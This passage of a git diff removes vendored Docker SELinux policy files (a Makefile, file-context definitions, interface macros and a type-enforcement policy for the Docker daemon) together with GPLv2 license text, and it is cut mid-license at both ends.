copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License along - with this program; if not, write to the Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - , 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile deleted file mode 100644 index 16df33ef32..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile +++ /dev/null @@ -1,23 +0,0 @@ -TARGETS?=docker -MODULES?=${TARGETS:=.pp.bz2} -SHAREDIR?=/usr/share - -all: ${TARGETS:=.pp.bz2} - -%.pp.bz2: %.pp - @echo Compressing $^ -\> $@ - bzip2 -9 $^ - -%.pp: %.te - make -f ${SHAREDIR}/selinux/devel/Makefile $@ - -clean: - rm -f *~ *.tc *.pp *.pp.bz2 - rm -rf tmp *.tar.gz - -man: install - sepolicy manpage --domain ${TARGETS}_t - -install: - semodule -i ${TARGETS} - diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md deleted file mode 100644 index 7ea3117a89..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md +++ /dev/null @@ -1 +0,0 @@ -SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc deleted file mode 100644 index d6cb0e5792..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc +++ /dev/null @@ -1,29 +0,0 @@ -/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) - -/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) -/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) -/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) - -/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) -/usr/lib/systemd/system/docker-novolume-plugin.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) - -/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) - -/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) - -/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) - -/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) - -/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) - -/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if deleted file mode 100644 index e087e8b98b..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if +++ /dev/null @@ -1,523 +0,0 @@ - -## The open-source application container engine. - -######################################## -## -## Execute docker in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_domtrans',` - gen_require(` - type docker_t, docker_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_exec_t, docker_t) -') - -######################################## -## -## Execute docker in the caller domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_exec',` - gen_require(` - type docker_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_exec_t) -') - -######################################## -## -## Search docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_search_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - files_search_var_lib($1) -') - -######################################## -## -## Execute docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - can_exec($1, docker_var_lib_t) -') - -######################################## -## -## Read docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Read docker share files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_share_files',` - gen_require(` - type docker_share_t; - ') - - files_search_var_lib($1) - list_dirs_pattern($1, docker_share_t, docker_share_t) - read_files_pattern($1, docker_share_t, docker_share_t) - read_lnk_files_pattern($1, docker_share_t, docker_share_t) -') - -###################################### -## -## Allow the specified domain to execute apache -## in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`apache_exec',` - gen_require(` - type httpd_exec_t; - ') - - can_exec($1, httpd_exec_t) -') - -###################################### -## -## Allow the specified domain to execute docker shared files -## in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_share_files',` - gen_require(` - type docker_share_t; - ') - - can_exec($1, docker_share_t) -') - -######################################## -## -## Manage docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) - manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Manage docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_dirs',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Create objects in a docker var lib directory -## with an automatic type transition to -## a specified private type. -## -## -## -## Domain allowed access. -## -## -## -## -## The type of the object to create. -## -## -## -## -## The class of the object to be created. -## -## -## -## -## The name of the object being created. -## -## -# -interface(`docker_lib_filetrans',` - gen_require(` - type docker_var_lib_t; - ') - - filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) -') - -######################################## -## -## Read docker PID files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_pid_files',` - gen_require(` - type docker_var_run_t; - ') - - files_search_pids($1) - read_files_pattern($1, docker_var_run_t, docker_var_run_t) -') - -######################################## -## -## Execute docker server in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_systemctl',` - gen_require(` - type docker_t; - type docker_unit_file_t; - ') - - systemd_exec_systemctl($1) - init_reload_services($1) - systemd_read_fifo_file_passwd_run($1) - allow $1 docker_unit_file_t:file read_file_perms; - allow $1 docker_unit_file_t:service manage_service_perms; - - ps_process_pattern($1, docker_t) -') - -######################################## -## -## Read and write docker shared memory. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_rw_sem',` - gen_require(` - type docker_t; - ') - - allow $1 docker_t:sem rw_sem_perms; -') - -####################################### -## -## Read and write the docker pty type. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_use_ptys',` - gen_require(` - type docker_devpts_t; - ') - - allow $1 docker_devpts_t:chr_file rw_term_perms; -') - -####################################### -## -## Allow domain to create docker content -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_filetrans_named_content',` - - gen_require(` - type docker_var_lib_t; - type docker_share_t; - type docker_log_t; - type docker_var_run_t; - type docker_home_t; - ') - - files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") - files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") - files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") - logging_log_filetrans($1, docker_log_t, dir, "lxc") - files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") - userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") -') - -######################################## -## -## Connect to docker over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_stream_connect',` - gen_require(` - type docker_t, docker_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) -') - -######################################## -## -## Connect to SPC containers over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_stream_connect',` - gen_require(` - type spc_t, spc_var_run_t; - ') - - files_search_pids($1) - files_write_all_pid_sockets($1) - allow $1 spc_t:unix_stream_socket connectto; -') - -######################################## -## -## All of the rules required to administrate -## an docker environment -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_admin',` - gen_require(` - type docker_t; - type docker_var_lib_t, docker_var_run_t; - type docker_unit_file_t; - type docker_lock_t; - type docker_log_t; - type docker_config_t; - ') - - allow $1 docker_t:process { ptrace signal_perms }; - ps_process_pattern($1, docker_t) - - admin_pattern($1, docker_config_t) - - files_search_var_lib($1) - admin_pattern($1, docker_var_lib_t) - - files_search_pids($1) - admin_pattern($1, docker_var_run_t) - - files_search_locks($1) - admin_pattern($1, docker_lock_t) - - logging_search_logs($1) - admin_pattern($1, docker_log_t) - - docker_systemctl($1) - admin_pattern($1, docker_unit_file_t) - allow $1 docker_unit_file_t:service all_service_perms; - - optional_policy(` - systemd_passwd_agent_exec($1) - systemd_read_fifo_file_passwd_run($1) - ') -') - -######################################## -## -## Execute docker_auth_exec_t in the docker_auth domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_auth_domtrans',` - gen_require(` - type docker_auth_t, docker_auth_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) -') - -###################################### -## -## Execute docker_auth in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_exec',` - gen_require(` - type docker_auth_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_auth_exec_t) -') - -######################################## -## -## Connect to docker_auth over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_stream_connect',` - gen_require(` - type docker_auth_t, docker_plugin_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) -') - -######################################## -## -## docker domain typebounds calling domain. -## -## -## -## Domain to be typebound. -## -## -# -interface(`docker_typebounds',` - gen_require(` - type docker_t; - ') - - typebounds docker_t $1; -') - -######################################## -## -## Allow any docker_exec_t to be an entrypoint of this domain -## -## -## -## Domain allowed access. -## -## -## -# -interface(`docker_entrypoint',` - gen_require(` - type docker_exec_t; - ') - allow $1 docker_exec_t:file entrypoint; -') diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te deleted file mode 100644 index 4231688382..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te +++ /dev/null @@ -1,399 +0,0 @@ -policy_module(docker, 1.0.0) - -######################################## -# -# Declarations -# - -## -##

-## Determine whether docker can -## connect to all TCP ports. -##

-##
-gen_tunable(docker_connect_any, false) - -type docker_t; -type docker_exec_t; -init_daemon_domain(docker_t, docker_exec_t) -domain_subj_id_change_exemption(docker_t) -domain_role_change_exemption(docker_t) - -type spc_t; -domain_type(spc_t) -role system_r types spc_t; - -type docker_auth_t; -type docker_auth_exec_t; -init_daemon_domain(docker_auth_t, docker_auth_exec_t) - -type spc_var_run_t; -files_pid_file(spc_var_run_t) - -type docker_var_lib_t; -files_type(docker_var_lib_t) - -type docker_home_t; -userdom_user_home_content(docker_home_t) - -type docker_config_t; -files_config_file(docker_config_t) - -type docker_lock_t; -files_lock_file(docker_lock_t) - -type docker_log_t; -logging_log_file(docker_log_t) - -type docker_tmp_t; -files_tmp_file(docker_tmp_t) - -type docker_tmpfs_t; -files_tmpfs_file(docker_tmpfs_t) - -type docker_var_run_t; -files_pid_file(docker_var_run_t) - -type docker_plugin_var_run_t; -files_pid_file(docker_plugin_var_run_t) - -type docker_unit_file_t; -systemd_unit_file(docker_unit_file_t) - -type docker_devpts_t; -term_pty(docker_devpts_t) - -type docker_share_t; -files_type(docker_share_t) - -######################################## -# -# docker local policy -# -allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; -allow docker_t self:tun_socket relabelto; -allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; -allow docker_t self:fifo_file rw_fifo_file_perms; -allow docker_t self:unix_stream_socket create_stream_socket_perms; -allow docker_t self:tcp_socket create_stream_socket_perms; -allow docker_t self:udp_socket create_socket_perms; -allow docker_t self:capability2 block_suspend; - -docker_auth_stream_connect(docker_t) - -manage_files_pattern(docker_t, docker_home_t, docker_home_t) -manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) -manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) -userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") - -manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) -manage_files_pattern(docker_t, docker_config_t, docker_config_t) -files_etc_filetrans(docker_t, docker_config_t, dir, "docker") - -manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) -manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) -files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") - -manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) -manage_files_pattern(docker_t, docker_log_t, docker_log_t) -manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) -logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) -allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; - -manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -allow docker_t docker_tmpfs_t:dir relabelfrom; -can_exec(docker_t, docker_tmpfs_t) -fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) -allow docker_t docker_tmpfs_t:chr_file mounton; - -manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) -manage_files_pattern(docker_t, docker_share_t, docker_share_t) -manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) -allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; - -can_exec(docker_t, docker_share_t) -#docker_filetrans_named_content(docker_t) - -manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; -files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) - -allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; -term_create_pty(docker_t, docker_devpts_t) - -kernel_read_system_state(docker_t) -kernel_read_network_state(docker_t) -kernel_read_all_sysctls(docker_t) -kernel_rw_net_sysctls(docker_t) -kernel_setsched(docker_t) -kernel_read_all_proc(docker_t) - -domain_use_interactive_fds(docker_t) -domain_dontaudit_read_all_domains_state(docker_t) - -corecmd_exec_bin(docker_t) -corecmd_exec_shell(docker_t) - -corenet_tcp_bind_generic_node(docker_t) -corenet_tcp_sendrecv_generic_if(docker_t) -corenet_tcp_sendrecv_generic_node(docker_t) -corenet_tcp_sendrecv_generic_port(docker_t) -corenet_tcp_bind_all_ports(docker_t) -corenet_tcp_connect_http_port(docker_t) -corenet_tcp_connect_commplex_main_port(docker_t) -corenet_udp_sendrecv_generic_if(docker_t) -corenet_udp_sendrecv_generic_node(docker_t) -corenet_udp_sendrecv_all_ports(docker_t) -corenet_udp_bind_generic_node(docker_t) -corenet_udp_bind_all_ports(docker_t) - -files_read_config_files(docker_t) -files_dontaudit_getattr_all_dirs(docker_t) -files_dontaudit_getattr_all_files(docker_t) - -fs_read_cgroup_files(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_search_all(docker_t) -fs_getattr_all_fs(docker_t) - -storage_raw_rw_fixed_disk(docker_t) - -auth_use_nsswitch(docker_t) -auth_dontaudit_getattr_shadow(docker_t) - -init_read_state(docker_t) -init_status(docker_t) - -logging_send_audit_msgs(docker_t) -logging_send_syslog_msg(docker_t) - -miscfiles_read_localization(docker_t) - -mount_domtrans(docker_t) - -seutil_read_default_contexts(docker_t) -seutil_read_config(docker_t) - -sysnet_dns_name_resolve(docker_t) -sysnet_exec_ifconfig(docker_t) - -optional_policy(` - rpm_exec(docker_t) - rpm_read_db(docker_t) - rpm_exec(docker_t) -') - -optional_policy(` - fstools_domtrans(docker_t) -') - -optional_policy(` - iptables_domtrans(docker_t) -') - -optional_policy(` - openvswitch_stream_connect(docker_t) -') - -# -# lxc rules -# - -allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; - -allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; - -allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; -allow docker_t self:netlink_audit_socket create_netlink_socket_perms; -allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; -allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; - -allow docker_t docker_var_lib_t:dir mounton; -allow docker_t docker_var_lib_t:chr_file mounton; -can_exec(docker_t, docker_var_lib_t) - -kernel_dontaudit_setsched(docker_t) -kernel_get_sysvipc_info(docker_t) -kernel_request_load_module(docker_t) -kernel_mounton_messages(docker_t) -kernel_mounton_all_proc(docker_t) -kernel_mounton_all_sysctls(docker_t) -kernel_unlabeled_entry_type(spc_t) -kernel_unlabeled_domtrans(docker_t, spc_t) - -dev_getattr_all(docker_t) -dev_getattr_sysfs_fs(docker_t) -dev_read_urand(docker_t) -dev_read_lvm_control(docker_t) -dev_rw_sysfs(docker_t) -dev_rw_loop_control(docker_t) -dev_rw_lvm_control(docker_t) - -files_getattr_isid_type_dirs(docker_t) -files_manage_isid_type_dirs(docker_t) -files_manage_isid_type_files(docker_t) -files_manage_isid_type_symlinks(docker_t) -files_manage_isid_type_chr_files(docker_t) -files_manage_isid_type_blk_files(docker_t) -files_exec_isid_files(docker_t) -files_mounton_isid(docker_t) -files_mounton_non_security(docker_t) -files_mounton_isid_type_chr_file(docker_t) - -fs_mount_all_fs(docker_t) -fs_unmount_all_fs(docker_t) -fs_remount_all_fs(docker_t) -files_mounton_isid(docker_t) -fs_manage_cgroup_dirs(docker_t) -fs_manage_cgroup_files(docker_t) -fs_relabelfrom_xattr_fs(docker_t) -fs_relabelfrom_tmpfs(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_list_hugetlbfs(docker_t) - -term_use_generic_ptys(docker_t) -term_use_ptmx(docker_t) -term_getattr_pty_fs(docker_t) -term_relabel_pty_fs(docker_t) -term_mounton_unallocated_ttys(docker_t) - -modutils_domtrans_insmod(docker_t) - -systemd_status_all_unit_files(docker_t) -systemd_start_systemd_services(docker_t) - -userdom_stream_connect(docker_t) -userdom_search_user_home_content(docker_t) -userdom_read_all_users_state(docker_t) -userdom_relabel_user_home_files(docker_t) -userdom_relabel_user_tmp_files(docker_t) -userdom_relabel_user_tmp_dirs(docker_t) - -optional_policy(` - gpm_getattr_gpmctl(docker_t) -') - -optional_policy(` - dbus_system_bus_client(docker_t) - init_dbus_chat(docker_t) - init_start_transient_unit(docker_t) - - optional_policy(` - systemd_dbus_chat_logind(docker_t) - systemd_dbus_chat_machined(docker_t) - ') - - optional_policy(` - firewalld_dbus_chat(docker_t) - ') -') - -optional_policy(` - udev_read_db(docker_t) -') - -optional_policy(` - unconfined_domain(docker_t) - unconfined_typebounds(docker_t) -') - -optional_policy(` - virt_read_config(docker_t) - virt_exec(docker_t) - virt_stream_connect(docker_t) - virt_stream_connect_sandbox(docker_t) - virt_exec_sandbox_files(docker_t) - virt_manage_sandbox_files(docker_t) - virt_relabel_sandbox_filesystem(docker_t) - # for lxc - virt_transition_svirt_sandbox(docker_t, system_r) - virt_mounton_sandbox_file(docker_t) -# virt_attach_sandbox_tun_iface(docker_t) - allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; - virt_sandbox_entrypoint(docker_t) -') - -tunable_policy(`docker_connect_any',` - corenet_tcp_connect_all_ports(docker_t) - corenet_sendrecv_all_packets(docker_t) - corenet_tcp_sendrecv_all_ports(docker_t) -') - -######################################## -# -# spc local policy -# -allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; -role system_r types spc_t; - -domtrans_pattern(docker_t, docker_share_t, spc_t) -domtrans_pattern(docker_t, docker_var_lib_t, spc_t) -allow docker_t spc_t:process { setsched signal_perms }; -ps_process_pattern(docker_t, spc_t) -allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; -filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") - -optional_policy(` - systemd_dbus_chat_machined(spc_t) -') - -optional_policy(` - dbus_chat_system_bus(spc_t) -') - -optional_policy(` - unconfined_domain_noaudit(spc_t) -') - -optional_policy(` - virt_transition_svirt_sandbox(spc_t, system_r) - virt_sandbox_entrypoint(spc_t) -') - -######################################## -# -# docker_auth local policy -# -allow docker_auth_t self:fifo_file rw_fifo_file_perms; -allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; -dontaudit docker_auth_t self:capability net_admin; - -docker_stream_connect(docker_auth_t) - -manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) - -domain_use_interactive_fds(docker_auth_t) - -kernel_read_net_sysctls(docker_auth_t) - -auth_use_nsswitch(docker_auth_t) - -files_read_etc_files(docker_auth_t) - -miscfiles_read_localization(docker_auth_t) - -sysnet_dns_name_resolve(docker_auth_t) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE deleted file mode 100644 index d511905c16..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE +++ /dev/null @@ -1,339 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Lesser General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients 